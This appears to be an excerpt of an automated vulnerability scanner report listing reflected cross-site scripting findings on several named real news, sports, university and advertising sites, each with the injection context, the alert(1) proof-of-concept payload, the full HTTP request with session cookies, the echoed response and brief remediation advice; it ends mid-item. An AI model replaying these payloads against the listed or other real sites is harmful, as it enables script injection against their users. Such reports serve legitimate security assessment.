The value of the refer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f271e\'%3balert(1)//a250fd91b21 was submitted in the refer parameter. This input was echoed as f271e\\';alert(1)//a250fd91b21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /shared/EmailAFriend.aspx?refer=http%3A%2F%2Fnewspaperads.mercurynews.com%2FROP%2Fads.aspx%3Fadvid%3D36689%26a%3DFremont%2BToyotaf271e\'%3balert(1)//a250fd91b21 HTTP/1.1 Host: newspaperads.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 08 Dec 2010 01:09:48 GMT Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19481
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/2000/rec-xhtml1-20000126/dtd/xhtml1-transitional.dtd">
The value of the button request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7411a"%3balert(1)//80df5942092 was submitted in the button parameter. This input was echoed as 7411a";alert(1)//80df5942092 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /script.js?sid=756&button=chat7411a"%3balert(1)//80df5942092 HTTP/1.1 Host: rtn.fididel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:12:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=lfkg47j6env7cmuke2ld0ao7j4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 14348
var seller_available = true; var BUTTON_TYPE = "default"; var request_type = "chat"; var BUTTON_IMAGE = "chat7411a";alert(1)//80df5942092"; var seller_id = 756; var BUTTON_URL = "https://rtn.fididel.com/"; var login_details = ""; var fididel_url = BUTTON_URL + "rtn/chat/seller/756/source/";
The value of the c_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d0d"><script>alert(1)</script>aa72252b172 was submitted in the c_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jsp?c_id=sf13d0d"><script>alert(1)</script>aa72252b172 HTTP/1.1 Host: sanfrancisco.giants.mlb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=589 Expires: Wed, 08 Dec 2010 01:22:11 GMT Date: Wed, 08 Dec 2010 01:12:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 128803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/ ...[SNIP]... <meta property="og:url" content="http://mlb.mlb.com/index.jsp?c_id=sf13d0d"><script>alert(1)</script>aa72252b172&tcid=fb_share" /> ...[SNIP]...
4.81. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sanfrancisco.giants.mlb.com
Path:
/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aec3c"><script>alert(1)</script>eaa73b89501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jsp?aec3c"><script>alert(1)</script>eaa73b89501=1 HTTP/1.1 Host: sanfrancisco.giants.mlb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=600 Expires: Wed, 08 Dec 2010 01:22:18 GMT Date: Wed, 08 Dec 2010 01:12:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 128728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/ ...[SNIP]... <meta property="og:url" content="http://mlb.mlb.com/index.jsp?aec3c"><script>alert(1)</script>eaa73b89501=1&tcid=fb_share" /> ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload ccd91<script>alert(1)</script>c01fa757eda was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?q=ccd91<script>alert(1)</script>c01fa757eda&btnG=GO&site=Haas&client=Haas&proxystylesheet=Haas&output=xml_no_dtd HTTP/1.1 Host: search.haas.berkeley.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: Close Cache-Control: private Content-Type: text/html Server: GWS/2.1 Date: Wed, 08 Dec 2010 01:12:41 GMT Content-Length: 6462
The value of the rFreeForm request parameter is copied into an HTML comment. The payload f5a0e--><script>alert(1)</script>64ef3b2d457 was submitted in the rFreeForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /portlet/registration/html/info.jsp?rFreeForm=mngi-registration-faqf5a0e--><script>alert(1)</script>64ef3b2d457 HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; JSESSIONID=NYJ0A2DF2B5NKCUUCBWCFFA; s_cc=true; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=280449122501380_1_0.01_0_5_1292194310310; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; __qca=P0-326766520-1291762315669;
<html><head><script><!-- window.focus(); //--></script><link type="text/css" rel="stylesheet" href='https://secure.extras.mnginteractive.com/live/css/MNGiDefaultStyles.css'><script> function o ...[SNIP]... <!-- BEGIN FREEFORM RENDER, ID mngi-registration-faqf5a0e--><script>alert(1)</script>64ef3b2d457 --> ...[SNIP]...
The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18877</script><script>alert(1)</script>c36a3fbc37b was submitted in the rPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration?rPage=register18877</script><script>alert(1)</script>c36a3fbc37b HTTP/1.1 Host: secure.www.mercurynews.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __g_u=280449122501380_1_0.01_0_5_1292194310310; __qca=P0-326766520-1291762315669; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; UserType=Browser; s_cc=true; s_sq=%5B%5BB%5D%5D; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... and = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: register18877</script><script>alert(1)</script>c36a3fbc37b"; var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]...
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15d3b%3balert(1)//efa2ba8e7b5 was submitted in the cb parameter. This input was echoed as 15d3b;alert(1)//efa2ba8e7b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.86. http://tipd.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tipd.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5d"><script>alert(1)</script>2b49c49b09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e4a5d"><script>alert(1)</script>2b49c49b09f=1 HTTP/1.1 Host: tipd.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.87. http://redcated/INV/iview/255848431/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/INV/iview/255848431/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770c1"><script>alert(1)</script>c7522e6df6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /INV/iview/255848431/direct/01?time=1291762383.966276&click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NHE5cXA5NChnaWQkYmZjOWI4ZjgtMDI1NC0xMWUwLWE4MDItYTdhNGRmODYzYTJlLHN0JDEyOTE3NjIzODM5Mjg1NDksc2kkMzAxMDUxLHYkMS4wLGFpZCRMU1pZWEdLSVZTRS0sY3QkMjUseWJ4JFA4R3ZIWlIuNkxSbTllcFl0aDhNQ0EsciQwKSk/1/*&770c1"><script>alert(1)</script>c7522e6df6a=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 549 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:17 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d78e4'%3b92a1d3fb0f1 was submitted in the REST URL parameter 4. This input was echoed as d78e4';92a1d3fb0f1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/directd78e4'%3b92a1d3fb0f1/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic? HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 8099 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:43 GMT
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50af7"><script>alert(1)</script>f362e8db181 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?50af7"><script>alert(1)</script>f362e8db181 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7921 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:13 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a517b'-alert(1)-'e692d5239a was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?a517b'-alert(1)-'e692d5239a HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7841 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:14 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afa3b"-alert(1)-"327957558af was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?afa3b"-alert(1)-"327957558af HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7873 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:14 GMT
4.92. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034928/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db5aa"-alert(1)-"1aee359f408 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?&db5aa"-alert(1)-"1aee359f408=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 8088 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:22 GMT
4.93. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034928/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43080'-alert(1)-'fca2f4a2c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?&43080'-alert(1)-'fca2f4a2c3a=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7888 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:23 GMT
4.94. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034928/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd784"><script>alert(1)</script>a2d52e07740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?&cd784"><script>alert(1)</script>a2d52e07740=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 8166 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:21 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ddf0'%3bd0018033e5b was submitted in the REST URL parameter 4. This input was echoed as 7ddf0';d0018033e5b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct7ddf0'%3bd0018033e5b/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic? HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 8086 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:40 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd442"-alert(1)-"5e518770aae was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?dd442"-alert(1)-"5e518770aae HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 8068 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:13 GMT
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2bb4"><script>alert(1)</script>845b395784a was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?d2bb4"><script>alert(1)</script>845b395784a HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7909 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:13 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4262d'-alert(1)-'fd885f905cf was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?4262d'-alert(1)-'fd885f905cf HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7861 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:13 GMT
4.99. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034929/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4263"><script>alert(1)</script>47a9821c38b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
